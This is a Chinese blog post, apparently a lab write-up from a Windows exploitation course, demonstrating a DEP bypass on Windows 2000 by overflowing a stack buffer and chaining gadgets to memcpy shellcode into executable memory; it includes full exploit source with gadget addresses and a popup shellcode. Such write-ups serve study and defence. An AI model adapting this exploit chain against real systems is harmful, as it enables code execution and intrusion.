9.5 利用可执行内存挑战DEP

已于 2022-11-24 21:21:04 修改
阅读量872 收藏 1
点赞数
分类专栏: 0day安全 文章标签: windows 安全
于 2022-11-24 20:10:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/128021389
版权

目录

一、实验环境

二、实验思路

三、实验代码

四、实验步骤

1、寻找memcpy函数的地址

2、查看内存中可读可写可执行的内存

3、修复EBP

4、保证memcpy的源地址位于shellcode之前

一、实验环境

        操作系统:windows 2000

        软件:原版OD、VC++6.0

二、实验思路

        当进程的内存空间中存在一段可读可写可执行的内存时,将shellcode复制到这段内存中,劫持程序流程,shellcode就有执行的机会。

三、实验代码

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x74\xD9\xCE\x7D"//pop eax retn
"\x4E\x3C\x71\x7D"//pop pop retn
"\x85\x8B\x1D\x5D"//修正EBP retn 4
"\x78\xBD\xC2\x7D"//pop retn
"\x08\x00\x14\x00"//弹出对机器码在可执行空间的起始地址,转入执行用
"\x00\x00\x14\x00"//可执行内存空间地址,拷贝用
"\xC6\xC6\xEB\x77"//push esp jmp eax && 原始shellcode起始地址
"\xFF\x00\x00\x00"//shellcode长度
"\xB8\x1D\x92\x7C"//memcpy
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
;
void test()
{
	char tt[176];
	//__asm int 3
	memcpy(tt,shellcode,450);
}
int main()
{
	HINSTANCE hInst = LoadLibrary("shell32.dll");
	char temp[200];
	test();
    return 0;
}

        代码简要解释:
(1)函数test存在一个典型的溢出,通过向str复制超长字符串造成str溢出,进而覆盖函数的返回地址;

(2)覆盖掉函数返回地址后,利用Ret2Libc技术,利用memcpy函数将shellcode复制到内存中的可读可写可执行区域;

(3)最后在这段可执行的内存空间中执行shellcode,实现DEP的绕过。

四、实验步骤

1、寻找memcpy函数的地址

        可以看到memcpy函数位于0x7C921DB3处,在OD中查看该地址;

        选择0x7C921DB8作为函数memcpy的切入地址。

2、查看内存中可读可写可执行的内存

        右键设置访问属性,设置为可读可写可执行。

3、修复EBP

        首先用0x90填充返回地址之前的所有栈空间,因为memcpy函数用到EBP,所以在返回地址处填上修复EBP的代码,即PUSH ESP POP EBP RETN 4。

        在内存中找一条PUSH ESP POP EBP RETN 4指令,这里选0x5D1D8B85。

4、保证memcpy的源地址位于shellcode之前

        POP EAX RETN:用eax寄存器去控制程序执行流程

          这里用0x7DCED974处的POP EAX RETN。

        EAX保存的就是POP POP RETN指令序列的开始地址:

         选择0x7D713C4E处的POP POP RETN指令序列

        PUSH ESP JMP EAX,将当前ESP值作为memcpy的第二个参数,即复制的源地址。

        选择地址:0x77EBC6C6

         POP ECX RETN:用于中转,确保执行PUSH ESP JMP EAX指令。

        选择0x7DC2BD78处的POP ECX RETN指令 。

        如图所示构造shellcode:

         注意memcpy函数的返回地址(如下图):

        执行构造的shellcode之后,程序会执行到弹窗代码,但是因为选的内存初始状态不是可读可写可执行,改完属性,也不弹窗。

PT_silver
关注
专栏目录
利用Ret2Libc挑战DEP——利用ZwSetInformationProcess
Yx0051的博客
08-09 1231
终于看到著名的DEP机制了,今天可以好好的研究它了! DEP基本原理就是数据所在内存页标识为不可执行,这样就导致一个问题,就是我们之前所有的实验都建立在一个基础上:shellcode的执行是位于堆或者栈上的,我们通过覆盖上面的正常数据,将可执行的恶意数据放在上面进行程序流程劫持。后来,微软的程序员就发现了这个致命的漏洞,就创建了这个机制:从XP SP2开始,CPU一旦检测到在非可执行区域执行指令
0day 第12章--12.4节:利用执行内存挑战DEP
I have a dream
04-07 349
实验环境: winxp sp3 vs2010 实验配置: 关闭DEP、GS、SAFESEH,禁用优化,release版本 思路: 如果进程的内存空间中有一段可读可写可执行内存,而我们将shellcode复制到该内存,并劫持程序流程,则我们的shellcode就有执行的机会。 具体实施: 利用memcpy函数将shellcode复制到该段内存。 memcpy函数的部署可参考上一节 1、首先找到一段...
执行程序的内存分布
gaoxiaowei的专栏
09-02 1033
  原来一直对于可执行程序的内存分布很迷惑,最近查了好多资料以及请教了诸多高手,方有一些领悟,现将自己领悟的写下来,以供大家批评指正。 在操作系统中,一个进程就是处于执行期的程序(当然包括系统资源),实际上正在执行的程序代码的活标本。那么进程的逻辑地址空间是如何划分的呢?    图1做了简单的说明(Linux系统下的):    http://p.
执行程序的内存
b69412267044401的博客
10-03 290
一个图可以说明很多问题 #include <iostream> int a=0; int func(){return 1;} int _tmain(int argc, _TCHAR* argv[]) { int i=10; int j=11; std::cout&l...
执行内存的分配
杨小卫的专栏
01-04 1002
<br />//ExeMemory.h #ifndef _EXE_MEM_H_ #define _EXE_MEM_H_ #include <memory.h> #if defined(WIN32) && defined(_MSC_VER) #include <windows.h> #else #include <sys/mman.h> #endif typedef int (*ExeMemoyFun)(); typedef unsigned int size_t;
执行文件执行时的内存概图
UmdCoding的博客
07-30 523
简要分析可执行文件装载->进程虚拟空间->内存的缩图 参考: 《程序员的自我修养》 P167 《C++ Primer 》 P400对于可执行文件: 浅绿色部分: .data 段通常保存初始化的全局对象(变量)和局部static对象 .bss 段通常保存未初始化的全局对象(变量)和局部static对象 这部分装载分配到DATA VMA(我理解为静态内存)(VMA 会映射到Memory)
EAS的DEP客户端脚本中执行select和update的sql语句的方法
05-31
EAS二次开发中DEP在编辑或者列表界面写脚本时可调用的执行sql语句的方法。【本方法仅用于客户端代码中,如果是服务端代码,即对某实体进行DEP拓展,请参照官方出品DEP脚本指南】
利用dep代替go get获取私有库的方法教程
09-21
在这种情况下,`dep`作为一个更强大的依赖管理工具,能够解决这些问题,包括获取私有库。 `go get`的基本操作分为两个步骤:下载源码包和执行`go install`。它可以与多个代码托管平台(如BitBucket、GitHub、Google...
55.Windows漏洞利用之构建ROP链绕过DEP并获取Shell1
08-03
攻击者可以利用ROP链找到并调用VirtualProtect,将原本不可执行内存区域标记为可执行,从而执行攻击代码。 四、搭建实验环境 - XP系统:安装VulnServer,这是一个易受攻击的服务,常用于安全研究。 - Kali系统:...
【免费第四个】利用OpenAI写的Python小程序【开启关闭DEP
最新发布
01-23
【免费第四个】利用OpenAI写的Python小程序【开启关闭DEP
渗透测试-----4-缓冲区溢出
weixin_62693307的博客
01-17 858
然而,如果攻击者能够进入缓冲区的空间,那么“longjmp(buffer)”实际上是跳转到攻击者的代码。一个典型的例子就是Pe。通过改变程序的返回地址,当函数调用结束时,程序就跳转到攻击者设定的地址,而不是原先的地址。有时,攻击者想要的代码已经在被攻击的程序中了,攻击者所要做的只是对代码传递一些参数。比如,攻击代码要求执行“exec(“/bin/sh”)”,而在libc库中的代码执行“exec(arg)”,其中arg使一个指向一个字符串的指针参数,那么攻击者只要把传入的参数指针改向指向”/bin/sh”。
面试知识点-- 操作系统执行执行程序时,内存分配是怎样的?
巫山老妖
09-20 9954
执行程序的内存分布 GNU编译器生成的目标文件默认格式为elf(executive linked file)格式,这是Linux系统所采用的可执行链接文件的通用文件格式。elf格式由若干个段(section)组成,由标准c源代码生成的目标文件中包含以下段:       .text(正文段)包含程序的指令代码,       .data(数据段)包含固定的数据,如常量,
执行程序加载到内存的过程
热门推荐
Tyrion Lannister's Special column
11-19 1万+
在linux中,程序的加载,涉及到两个工具,linker 和loader。Linker主要涉及动态链接库的使用,loader主要涉及软件的加载。 1、  exec执行一个程序 2、  elf为现在非常流行的可执行文件的格式,它为程序运行划分了两个段,一个段是可以执行的代码段,它是只读,可执行;另一个段是数据段,它是可读写,不能执行。 3、  loader会启动,通过mmap系统调
VirtualAlloc 申请可执行内存
hambaga的博客
05-17 1572
假设我有一个数组,存储了加法函数的二进制代码(硬编码) 加法函数 int __cdecl Plus(int x, int y) { return x + y; } 硬编码数组 // Plus 的硬编码 unsigned char code[] = { 0x55, 0x8B,0xEC, 0x81,0xEC,0xC0,0x00,0x00,0x00, 0x53, 0x56, 0x57, 0x8D,0xBD,0x40,0xFF,0xFF,0xFF, 0xB9,0x30,0x00,0x00,0x0
C语言可执行程序内存分布
u010442934的专栏
07-05 1304
总结一下 C语言的可执行代码 在内存中的拍不
进程,可执行文件和内存的关系
mishuang2017的博客
03-24 1613
假设我们有如下程序:#include &lt;stdio.h&gt; int bss; int data = 10; void f(unsigned long *a) { *a = 1; } int main(int argc, char*argv[]) { int stack; void *heap; printf("bss:...
什么是可读,可写,可执行。 线性地址和TLB的关系
taolaodawho的博客
11-07 2377
C/C++的编程过程中应该都遇到过 0xC0000005,访问权限异常,当访问没有权限访问的页时候就会出现这个问题 经过这一段时间的学习,我发现我对可读可写可执行有了不一样的理解,从汇编层面 mov ds:[0x12345678],eax 是把eax的值存放到 0x12345678线性地址对应的物理地址 这个线性地址对应的物理页既是可写 mov eax,ds:[0x22222222] 这个线性地址0x22222222对应的物理页既是可读 想要理解什么是可读可写可执行首先需要理解页机制 ...
第十四课_读写内存
ELaXiaoSi的博客
10-24 2167
前言 今天讲讲汇编如何读写内存。 还有一件事,本id觉得,单单讲这些太无趣了,以后文章末尾加点东西,暂时叫《本id的梦话》,也想不出什么好名字了,内容不限,不过大多是生活吧,就算是记录一下自己的生活吧。 之前讲过第一条汇编指令,如:mov eax,0xFFFFFFFF,有自己在OD上练习的,这应该很熟悉。这个命令就是把十六进制的0xFFFFFFFF放到寄存器eax中。在汇编中我们把这种确切的数值(如这里的0xFFFFFFFF)称为立即数。 既然数能移到寄存器中,那如何移到内存中呢?也就是写到内.
磁盘读写的简单原理
jiangbinbin的博客
04-22 4486
转发:https://blog.csdn.net/zhanghongzheng3213/article/details/54141202/ 当程序要读取的数据时传入内存地址(行地址+列地址),如果数据不在主存中时,会触发一个缺页异常,此时系统会向磁盘发出读盘信号,通过柱面号,磁头号,扇区号定位磁盘位置,找到数据的起始位置并向后连续读取一页或几页载入内存中。 我们在程序中的数据处理...
EAS DEP客户端SQL执行:select与update实战
"EAS的DEP客户端脚本中执行SQL语句的详细步骤与方法" 在EAS(Enterprise Application System,企业应用系统)的DEP(Dynamic Extension Platform,动态扩展平台)二次开发过程中,有时我们需要在编辑或列表界面通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值